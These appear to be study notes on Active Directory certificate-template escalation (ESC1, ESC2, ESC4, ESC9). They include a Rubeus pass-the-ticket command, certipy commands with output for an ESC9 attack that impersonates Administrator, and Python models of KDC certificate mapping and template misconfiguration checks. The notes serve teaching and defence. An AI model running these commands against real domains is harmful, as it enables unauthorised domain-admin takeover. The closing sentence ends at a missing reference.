Import the base64-encoded Kerberos ticket into the current logon session with Rubeus pass-the-ticket (ptt):
PS C:\Tools> .\Rubeus.exe ptt /ticket:doIGQjCCBj6gAwIBBaEDAgEW<SNIP>
ESC1 - template-allows-san
The primary misconfiguration behind this escalation is that the certificate template lets the requester specify an alternate identity in the request. If the template allows the enrollee to include a subjectAltName (SAN) different from the user submitting the CSR, and the certificate is usable for client authentication, we can request a certificate as any user in the domain: the SAN UPN is what the KDC maps the certificate to.
ESC2 (Escalation 2) is a variation of ESC1.
When a certificate template specifies the Any Purpose Extended Key Usage (EKU) or does not identify any EKU at all, the certificate can be used for any purpose (client authentication, server authentication, code signing, etc.).
It involves a different EKU than ESC1 and needs an additional step to abuse: the issued certificate identifies the requester, not the target, so it is used like an enrollment agent certificate to request a second certificate on behalf of the target user (the same procedure as ESC3).
The term Extended Key Usage is sometimes written Enhanced Key Usage in Microsoft documentation, but section 4.2.1.12 of RFC 5280 defines the name as Extended Key Usage.
ESC9 - no-security-extension
If the template's msPKI-Enrollment-Flag attribute contains the flag CT_FLAG_NO_SECURITY_EXTENSION, the szOID_NTDS_CA_SECURITY_EXT extension (which embeds the requester's objectSid so the KDC can bind the certificate to the account strongly) is not included in issued certificates. The KDC then has only the SAN to map the certificate with, so even with StrongCertificateBindingEnforcement set to 1 the mapping is performed similarly to a value of 0 in that registry key, i.e. by UPN.
Here are the requirements to perform ESC9:
StrongCertificateBindingEnforcement (HKLM\SYSTEM\CurrentControlSet\Services\Kdc) not set to 2. The default was 1 (Compatibility mode) during the KB5014754 rollout, but the Full Enforcement phase changes it to 2, so verify the value on the DC. Alternatively, CertificateMappingMethods (HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\Schannel) contains the UPN flag (0x4)
The template contains the CT_FLAG_NO_SECURITY_EXTENSION flag in the msPKI-Enrollment-Flag value
The template specifies client authentication
On our side: GenericWrite (enough to change userPrincipalName) over some account A, which is used to compromise any target account B
Step 1: set the userPrincipalName of the controlled account user2 to the target's name
certipy account update -username "[email protected]" -hashes "a091c1832bcdd4677c28b5a6a1295584" -user "user2" -upn Administrator
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Updating user 'user2':
userPrincipalName : Administrator
[*] Successfully updated 'user2'
Step 2: request a certificate as user2 from the vulnerable template. Because the template omits the security extension, the issued certificate carries the UPN 'Administrator' and no object SID
certipy req -username "user2" -p "12345678" -target "10.10.11.41" -ca 'CA_NAME' -template 'TemplateName'
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 7
[*] Got certificate with UPN 'Administrator'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'
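To see why the certificate above is usable, here is a small Python model of the KDC's certificate-mapping decision under the three StrongCertificateBindingEnforcement values. It is an added example for these notes, not code from Certipy or Microsoft: it performs no Kerberos exchange and only encodes the documented decision flow (objectSid extension present: strong mapping; absent: weak UPN mapping that is accepted silently at 0, accepted with event 39 at 1, denied at 2). The directory, SIDs, dates and the implicit UPN-to-sAMAccountName fallback are constructed or modelled assumptions, as labelled in the code.

```python
"""Simplified model of KDC certificate mapping under KB5014754 enforcement modes.

Added example for these notes, not Certipy or Microsoft code. It does no real
Kerberos; it only encodes the documented decision flow so the ESC9 result above
('Got certificate with UPN Administrator', 'Certificate has no object SID') can
be traced through StrongCertificateBindingEnforcement = 0, 1 and 2.
Accounts, SIDs and certificates below are constructed sample data."""

from dataclasses import dataclass, field
from datetime import datetime, timezone
from typing import Optional

# OID of szOID_NTDS_CA_SECURITY_EXT, the extension that carries the requester's objectSid.
SZOID_NTDS_CA_SECURITY_EXT = "1.3.6.1.4.1.311.25.2"

# KDC event IDs documented in KB5014754.
EVENT_WEAK_MAPPING = 39      # valid cert, only weakly mapped (warning in compatibility mode)
EVENT_PREDATES_ACCOUNT = 40  # cert issued before the account existed
EVENT_SID_MISMATCH = 41      # SID extension present but not the mapped account's SID


@dataclass
class Account:
    sam: str
    upn: str
    sid: str
    when_created: datetime


@dataclass
class Certificate:
    san_upn: Optional[str]
    not_before: datetime
    extensions: dict = field(default_factory=dict)  # OID -> value


@dataclass
class MappingResult:
    accepted: bool
    mapped_to: Optional[str]
    strong: bool
    event_id: Optional[int]
    reason: str


def _by_upn(directory, upn):
    """Implicit UPN mapping. Assumption (modelled, not verified against the KDC source):
    a value without '@' is also compared with sAMAccountName, which is what lets the
    UPN 'Administrator' from the walkthrough land on the built-in Administrator."""
    if not upn:
        return None
    for acct in directory:
        if acct.upn.lower() == upn.lower():
            return acct
        if "@" not in upn and acct.sam.lower() == upn.lower():
            return acct
    return None


def map_certificate(cert, directory, enforcement):
    """enforcement: 0 disabled, 1 compatibility (the documented default at the time), 2 full."""
    sid = cert.extensions.get(SZOID_NTDS_CA_SECURITY_EXT)
    upn_acct = _by_upn(directory, cert.san_upn)

    # Strong path: the SID extension pins the certificate to exactly one objectSid.
    if sid is not None and enforcement != 0:
        sid_acct = next((a for a in directory if a.sid == sid), None)
        if sid_acct is None or (upn_acct is not None and upn_acct is not sid_acct):
            return MappingResult(False, None, True, EVENT_SID_MISMATCH,
                                 "SID extension does not match the account named in the SAN")
        return MappingResult(True, sid_acct.sam, True, None, "strong mapping via objectSid")

    # Weak path: no SID extension (the CT_FLAG_NO_SECURITY_EXTENSION case), map by UPN only.
    if upn_acct is None:
        return MappingResult(False, None, False, None, "no account matches the SAN UPN")
    if enforcement == 0:
        return MappingResult(True, upn_acct.sam, False, None, "weak UPN mapping, no checks")
    if enforcement == 1:
        if cert.not_before < upn_acct.when_created:
            return MappingResult(False, None, False, EVENT_PREDATES_ACCOUNT,
                                 "certificate predates the account")
        return MappingResult(True, upn_acct.sam, False, EVENT_WEAK_MAPPING,
                             "weak mapping accepted in compatibility mode (audit only)")
    return MappingResult(False, None, False, None, "weak mapping denied in full enforcement")


# Constructed directory: Administrator plus the controlled user2, whose UPN has already
# been set back to its own value after the certificate was issued.
T0 = datetime(2020, 1, 1, tzinfo=timezone.utc)
DIRECTORY = [
    Account("Administrator", "Administrator@corp.local", "S-1-5-21-1-2-3-500", T0),
    Account("user2", "user2@corp.local", "S-1-5-21-1-2-3-1105", T0),
]

# The certificate from the walkthrough: SAN UPN 'Administrator', no object SID.
ESC9_CERT = Certificate("Administrator", datetime(2024, 6, 1, tzinfo=timezone.utc))

# Same request from a template that does embed the security extension: user2's SID goes in.
SAFE_CERT = Certificate("Administrator", datetime(2024, 6, 1, tzinfo=timezone.utc),
                        {SZOID_NTDS_CA_SECURITY_EXT: "S-1-5-21-1-2-3-1105"})


def esc9_outcomes():
    """Return {mode: mapped account or None} for the ESC9 certificate."""
    return {mode: map_certificate(ESC9_CERT, DIRECTORY, mode).mapped_to for mode in (0, 1, 2)}


if __name__ == "__main__":
    for mode in (0, 1, 2):
        r = map_certificate(ESC9_CERT, DIRECTORY, mode)
        print(f"ESC9 cert, enforcement={mode}: accepted={r.accepted} as={r.mapped_to} "
              f"event={r.event_id} ({r.reason})")
    r = map_certificate(SAFE_CERT, DIRECTORY, 1)
    print(f"cert with SID ext, enforcement=1: accepted={r.accepted} event={r.event_id}")
```

The ESC9 certificate maps to Administrator at 0 and 1 and is refused at 2, while the same request from a template that embeds the SID extension is refused at 1 with event 41, which is why the CT_FLAG_NO_SECURITY_EXTENSION flag is the precondition. Before authenticating with such a certificate the controlled account's UPN has to be set back to its original value (the constructed directory already reflects that), otherwise two accounts would claim the same name.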
ESC1 is when a certificate template permits Client Authentication and allows the enrollee to supply an arbitrary Subject Alternative Name (SAN). Abuse: request a certificate based on the vulnerable template and specify an arbitrary UPN.
ESC4 (Escalation 4) is when a user has write privileges over a certificate template.
This can for instance be abused to overwrite the template's configuration so that it becomes vulnerable to ESC1 (enrollee supplies the subject, client authentication EKU, no manager approval). We need to know the target's DNS name and the template name.
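The conditions listed under ESC1 and ESC2 above, the ESC9 requirements, and the ESC4 rewrite described here all come down to a handful of template attributes. The Python below, an added example for these notes and not Certipy's code, evaluates those attributes for constructed templates and shows the attribute changes an ESC4 write makes to reach the ESC1 state. It assumes template records shaped like the LDAP attributes of a pKICertificateTemplate object, with a simplified 'enroll' list standing in for the enrollment ACEs of nTSecurityDescriptor, and takes the two registry values as parameters.

```python
"""Classify certificate templates for the ESC1, ESC2 and ESC9 conditions described in
these notes, and show what an ESC4 write changes to turn a template into an ESC1 one.

Added example, not Certipy's code and not part of the original notes. Input is a dict
shaped like the LDAP attributes of a pKICertificateTemplate object; 'enroll' is a
simplified stand-in for the enrollment ACEs in nTSecurityDescriptor. All template
records below are constructed."""

# Bit values from MS-CRTD.
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001  # msPKI-Certificate-Name-Flag
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002          # msPKI-Enrollment-Flag (manager approval)
CT_FLAG_NO_SECURITY_EXTENSION = 0x00080000      # msPKI-Enrollment-Flag

# EKUs the KDC accepts for client authentication; an empty EKU list also means any purpose.
OID_CLIENT_AUTH = "1.3.6.1.5.5.7.3.2"
OID_PKINIT_CLIENT_AUTH = "1.3.6.1.5.2.3.4"
OID_SMARTCARD_LOGON = "1.3.6.1.4.1.311.20.2.2"
OID_ANY_PURPOSE = "2.5.29.37.0"
OID_SERVER_AUTH = "1.3.6.1.5.5.7.3.1"
CLIENT_AUTH_OIDS = {OID_CLIENT_AUTH, OID_PKINIT_CLIENT_AUTH, OID_SMARTCARD_LOGON, OID_ANY_PURPOSE}

LOW_PRIV_PRINCIPALS = {"Domain Users", "Authenticated Users", "Domain Computers", "Everyone"}
CERTMAP_UPN = 0x4  # CertificateMappingMethods bit for UPN mapping (Schannel)


def ekus(tpl):
    return set(tpl.get("pKIExtendedKeyUsage", []))


def allows_client_auth(tpl):
    return not ekus(tpl) or bool(ekus(tpl) & CLIENT_AUTH_OIDS)


def enrollable_by_low_priv(tpl):
    """Enrollment by a low-privileged principal, no manager approval, no authorized signatures."""
    return (bool(set(tpl.get("enroll", [])) & LOW_PRIV_PRINCIPALS)
            and not tpl["msPKI-Enrollment-Flag"] & CT_FLAG_PEND_ALL_REQUESTS
            and tpl.get("msPKI-RA-Signature", 0) == 0)


def classify(tpl, kdc_enforcement=1, schannel_mapping_methods=0x18):
    """kdc_enforcement is StrongCertificateBindingEnforcement (HKLM\\...\\Services\\Kdc);
    schannel_mapping_methods is CertificateMappingMethods (HKLM\\...\\SecurityProviders\\Schannel),
    defaulting to 0x18, i.e. without the UPN method."""
    findings = []
    if not enrollable_by_low_priv(tpl):
        return findings
    if tpl["msPKI-Certificate-Name-Flag"] & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT and allows_client_auth(tpl):
        findings.append("ESC1")
    if not ekus(tpl) or OID_ANY_PURPOSE in ekus(tpl):
        findings.append("ESC2")
    weak_mapping_possible = kdc_enforcement != 2 or bool(schannel_mapping_methods & CERTMAP_UPN)
    if (tpl["msPKI-Enrollment-Flag"] & CT_FLAG_NO_SECURITY_EXTENSION
            and allows_client_auth(tpl) and weak_mapping_possible):
        findings.append("ESC9")  # still needs GenericWrite over some account, see above
    return findings


def esc4_make_esc1(tpl):
    """The attribute changes an ESC4 write makes to reach the ESC1 conditions: let the
    enrollee supply the subject, drop manager approval and signatures, make sure a
    client-auth EKU is present, and grant enrollment to Domain Users."""
    new = dict(tpl)
    new["msPKI-Certificate-Name-Flag"] = tpl["msPKI-Certificate-Name-Flag"] | CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT
    new["msPKI-Enrollment-Flag"] = tpl["msPKI-Enrollment-Flag"] & ~CT_FLAG_PEND_ALL_REQUESTS
    new["msPKI-RA-Signature"] = 0
    if ekus(tpl) and not ekus(tpl) & CLIENT_AUTH_OIDS:
        new["pKIExtendedKeyUsage"] = sorted(ekus(tpl) | {OID_CLIENT_AUTH})
    new["enroll"] = sorted(set(tpl.get("enroll", [])) | {"Domain Users"})
    return new


# Constructed templates. 0xA6000000 is the name-flag value found on the built-in User
# template (subject built from AD, UPN in SAN); it does not include ENROLLEE_SUPPLIES_SUBJECT.
TEMPLATES = {
    "User":       {"msPKI-Certificate-Name-Flag": 0xA6000000, "msPKI-Enrollment-Flag": 0x29,
                   "pKIExtendedKeyUsage": [OID_CLIENT_AUTH, "1.3.6.1.4.1.311.10.3.4", "1.3.6.1.5.5.7.3.4"],
                   "enroll": ["Domain Users"]},
    "VulnSAN":    {"msPKI-Certificate-Name-Flag": 0x1, "msPKI-Enrollment-Flag": 0x0,
                   "pKIExtendedKeyUsage": [OID_CLIENT_AUTH], "enroll": ["Domain Users"]},
    "AnyPurpose": {"msPKI-Certificate-Name-Flag": 0xA6000000, "msPKI-Enrollment-Flag": 0x0,
                   "pKIExtendedKeyUsage": [OID_ANY_PURPOSE], "enroll": ["Domain Users"]},
    "NoSecExt":   {"msPKI-Certificate-Name-Flag": 0xA6000000, "msPKI-Enrollment-Flag": 0x80000,
                   "pKIExtendedKeyUsage": [OID_CLIENT_AUTH], "enroll": ["Domain Users"]},
    "WebServer":  {"msPKI-Certificate-Name-Flag": 0x1, "msPKI-Enrollment-Flag": 0x0,
                   "pKIExtendedKeyUsage": [OID_SERVER_AUTH], "enroll": ["Domain Admins"]},
}


if __name__ == "__main__":
    for name, tpl in TEMPLATES.items():
        print(f"{name:<11} {classify(tpl) or '-'}")
    print("WebServer after ESC4 rewrite:", classify(esc4_make_esc1(TEMPLATES["WebServer"])))
    print("NoSecExt with enforcement=2:", classify(TEMPLATES["NoSecExt"], kdc_enforcement=2) or "-")
```

WebServer is not a finding on its own (it lets the enrollee supply the subject but only carries Server Authentication and is only enrollable by Domain Admins); after the ESC4 rewrite it classifies as ESC1. NoSecExt stops being ESC9 once the KDC is in Full Enforcement unless Schannel still has the UPN mapping method enabled, which mirrors the two alternatives in the requirements list.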
To understand this privilege escalation, it is recommended to know how certificate mapping is performed. It is presented in .